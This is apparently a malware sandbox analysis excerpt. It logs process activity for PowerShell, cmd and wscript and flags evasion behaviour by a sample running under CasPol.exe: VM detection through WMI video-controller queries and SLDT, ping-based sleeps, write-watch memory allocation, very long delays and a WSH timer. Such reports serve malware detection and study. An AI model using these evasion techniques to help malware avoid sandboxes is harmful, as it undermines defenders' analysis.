Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 1240000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 1780000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 3500000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 1780000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: FB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 2D80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 2950000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 2FA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 3490000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 5490000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 1860000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 3540000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 3140000 memory reserve | memory write watch
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF7B38E9589 sldt word ptr fs:[eax] 18_2_00007FF7B38E9589
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
